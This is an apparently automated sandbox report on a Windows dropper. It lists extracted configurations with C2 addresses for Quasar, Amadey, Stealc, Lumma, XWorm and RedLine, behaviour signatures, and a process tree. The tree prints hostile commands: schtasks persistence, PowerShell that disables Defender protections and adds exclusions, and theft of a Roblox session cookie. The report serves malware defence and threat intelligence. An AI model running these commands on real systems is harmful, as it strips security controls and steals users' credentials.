Resubmissions
27/02/2025, 06:33
250227-hbn4tszmx7 1026/02/2025, 23:57
250226-3zn4ysxwc1 1026/02/2025, 23:14
250226-271x2sxmz9 1014/02/2025, 01:10
250214-bjsnnayne1 1014/02/2025, 01:00
250214-bc5pmsymhw 1013/02/2025, 05:01
250213-fnkwtstpgw 1013/02/2025, 04:24
250213-e1kk6atmaz 1013/02/2025, 04:08
250213-eqe8patkgx 812/02/2025, 23:56
250212-3yzt3azrdx 10Analysis
-
max time kernel
165s -
max time network
608s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
-
submitted
26/11/2024, 19:01
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Score
10/10
Malware Config
Extracted
Family
quasar
Version
1.4.1
Botnet
Office04
C2
192.168.100.18:4782
Mutex
2cbe985c-9a4f-4f1f-a761-cd05d5feff4b
Attributes
-
encryption_key
9493303F9F1D303190787B3D987F2DCB2BAF3CFD
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.0
Botnet
Office04
C2
137.184.144.245:4782
Mutex
6cfe4a65-c41d-4b02-9ae9-e727a748ae84
Attributes
-
encryption_key
B702BA239316FCF317B584A351F2EC1696EBE772
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java updater
-
subdirectory
SubDir
Extracted
Family
amadey
Version
4.41
Botnet
fed3aa
C2
http://185.215.113.16
Attributes
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
rc4.plain
Extracted
Family
stealc
Botnet
default_valenciga
C2
http://185.215.113.17
Attributes
-
url_path
/2fb6c2cc8dce150a.php
Extracted
Family
lumma
C2
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
Extracted
Family
xworm
Version
5.0
C2
45.141.26.170:7000
Mutex
kkeD0iZ90XXPXCyz
Attributes
-
Install_directory
%ProgramData%
-
install_file
VLC_Media.exe
aes.plain
Extracted
Family
stealc
Botnet
mars
C2
http://185.215.113.206
Attributes
-
url_path
/c4becf79229cb002.php
Extracted
Family
redline
C2
38.180.109.140:20007
Extracted
Family
lumma
C2
https://push-hook.cyou/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
-
Ammyyadmin family
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
BabbleLoader
BabbleLoader is a malware loader written in C++.
-
Babbleloader family
-
Detect Neshta payload 50 IoCs
-
Detect Xworm Payload 5 IoCs
-
Detects BabbleLoader Payload 1 IoCs
-
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
-
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Neshta family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
-
Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 6 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Redline family
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
ZharkBot
ZharkBot is a botnet written C++.
-
Zharkbot family
-
Async RAT payload 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 31 IoCs
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 4 IoCs
Detects Themida, an advanced Windows software protection system.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 19 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Detects Pyinstaller 1 IoCs
-
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 11 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 22 IoCs
-
Suspicious use of SendNotifyMessage 22 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\client.exeC:\Users\Admin\AppData\Local\Temp\Files\client.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exeC:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"9⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exeC:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exeC:\Users\Admin\AppData\Local\Temp\Files\plswork.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\winn.exeC:\Users\Admin\AppData\Local\Temp\Files\winn.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\soft.exeC:\Users\Admin\AppData\Local\Temp\Files\soft.exe4⤵
- Executes dropped EXE
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exeC:\Users\Admin\AppData\Local\Temp\Files\random.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe12⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe14⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"15⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe16⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"17⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe18⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"19⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe20⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"21⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe22⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"23⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe24⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe26⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"27⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe28⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exeC:\Users\Admin\AppData\Local\Temp\Files\m.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2946613613.exeC:\Users\Admin\AppData\Local\Temp\2946613613.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f8⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f9⤵
- Modifies registry key
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /f /tn Windows Upgrade Manager9⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\248483651.exeC:\Users\Admin\AppData\Local\Temp\248483651.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3058827245.exeC:\Users\Admin\AppData\Local\Temp\3058827245.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
-
-
C:\Users\Admin\AppData\Local\Temp\322341857.exeC:\Users\Admin\AppData\Local\Temp\322341857.exe6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\2767925072.exeC:\Users\Admin\AppData\Local\Temp\2767925072.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\2928124777.exeC:\Users\Admin\AppData\Local\Temp\2928124777.exe7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\2578412766.exeC:\Users\Admin\AppData\Local\Temp\2578412766.exe6⤵
-
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\513022960.exeC:\Users\Admin\AppData\Local\Temp\513022960.exe8⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f10⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f11⤵
- Modifies registry key
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /f /tn Windows Upgrade Manager11⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\287511317.exeC:\Users\Admin\AppData\Local\Temp\287511317.exe8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\154057176.exeC:\Users\Admin\AppData\Local\Temp\154057176.exe8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\520429473.exeC:\Users\Admin\AppData\Local\Temp\520429473.exe8⤵
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
-
-
